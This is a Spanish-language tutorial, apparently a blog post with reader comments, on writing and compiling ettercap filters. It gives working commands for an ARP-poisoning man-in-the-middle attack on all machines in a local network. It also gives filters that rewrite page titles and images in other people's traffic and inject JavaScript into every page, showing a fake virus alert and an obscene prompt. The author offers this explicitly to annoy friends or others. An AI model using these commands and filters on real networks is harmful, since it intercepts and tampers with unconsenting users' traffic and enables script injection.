Les motraré cómo crear filtros simples para usar con ettercap, para que podamos modificar parte del tráfico como tags html, conversaciones de chat, etc.
Para esto necesitamos obviamente instalar el suit ettercap-ng, lo podemos descargar desde Sitio oficial ettercap
Haremos las pruebas con el sitio https://www.google.cl, modificaremos el título, el contenido, la imágen, etc.
Para este ejemplo vamos a crear un filtro llamado google.filter. Lo creamos usando nuestro editor de texto preferido, en mi caso vim:
$ vim google.filter
En él escribimos:
replace("</title>", "</titleee>");
replace("<title>", "<title>Gooooooogle</title><titleee>");Guardamos y compilamos el filtro usando etterfilter:
$ etterfilter google.filter
Nos creará un fichero llamado filter.ef, que es el que usaremos.
Ejecutamos ettercap y aplicamos el filtro:
# ettercap -Tq -M arp:remote -i interface -F filter.ef // //
Ahora cualquier pc de la red, cuando ingrese a Google, verá el título modificado.
Podemos modificar el tag o información que queramos, no solo html, sino todo el tráfico de la red.
Por ejemplo, si queremos modificar la o las imágen de un sitio:
replace("\<img", "\<img src=https://direccion..de/la/imagen/que/quieres_insertar.jpg\> \<aaa");nota: Con todo esto, lo que estámos haciendo es modificar cualquier información que este viajando por la red, no solo las páginas web, si hacen la prueba y escriben <img por msn, verán que ettercap automáticamente lo reemplazará por lo que especificamos en el filtro.
Tambien podemos especificar que sólo queremos jugar con el protocolo http y la web agregando la siguiente condición a nuestro filtro:
if (ip.proto == TCP && tcp.src == 80) {
[...] acá las acciones
}Aprendiendo a aplicar e implementar estos filtros podemos hacer una infinidades de cosas divertidas, ya sea para fastidiar a algun amigo o simplemente para joder a los demás. Es cosa de usar la imaginación, por ejemplo, el siguiente filtro:
replace("\<body", "\<body onload=\"alert('Usted tiene un virus.');confirm('Chupamela?');\"\>");Hará que cuando alguien ingrese a cualquier sitio aparezca una alerta diciendo que tiene un virus y luego, para joderle un poco más, una ventana de confirmación.
hice estas pruebas y me tira el siguiente mensaje:
Content filters loaded from filter.ef...
Listening on interface...
ERROR : 19, No such device
[ec_capture.c:capture_init:146]
pcap_open: SIOCGIFHWADDR: No such device
es porque no estoy en una red, o porque estoy haciendo algo mal?
Muchas Gracias.
saludos
saludos
Saludos
Saludos!
saludos
Lo que vendria de cajon sería, hacer un glosario con: cuáles son los comandos que aguanta el generador de filtro.
Ya sabemos que aguanta. replace, los if,
Ya